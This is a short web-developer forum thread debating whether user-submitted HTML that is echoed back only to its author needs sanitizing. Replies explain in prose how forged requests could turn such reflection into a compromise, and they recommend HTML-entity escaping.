need to sanitize?
Moderator: General Moderators
Hard to explain, is down to my own ethics I guess. It's not a case of better safe then sorry, it's more a case of just not wanting my site to be involved in any form of attack, be it a 'suicide' as would happen in this scenario, or used to attack other users.Maugrim_The_Reaper wrote:User enters HTML, HTML is not stored (even temp), same user is the only one capable of seeing their own HTML.
What's to sanitise?
Unless the data is eval'd, outputted to another user, or stored I see no reason...
- Ambush Commander
- DevNet Master
- Posts: 3698
- Joined: Mon Oct 25, 2004 9:29 pm
- Location: New Jersey, US
Here's an idea. Guy makes joke website that has a big, red, fluffy DO NOT PRESS button. Obviously, people press it.User enters HTML, HTML is not stored (even temp), same user is the only one capable of seeing their own HTML.
What's to sanitise?
Unless the data is eval'd, outputted to another user, or stored I see no reason...
What the form does is sends the system you describe evil HTML, which the server gurgles back. Bang, compromise.
Sure, you could check referrers or use challenges to stop request forging, but wouldn't it be a lot nicer just to do the darn thing properly? (or htmlentity-ize the whole thing)
- RobertGonzalez
- Site Administrator
- Posts: 14293
- Joined: Tue Sep 09, 2003 6:04 pm
- Location: Fremont, CA, USA
Hey hey, maybe that wasn't such a stupid idea? Eh?Everah wrote:I don't think sanitizing is necessary. I might consider running it through an HTML entity conversion for safety sakes, but essentially the post data will reside in temporary space seeing as the posted data will be immediately displayed on screen to user that posted it. If anyone is going to be affected by it, it will be the person that posted it.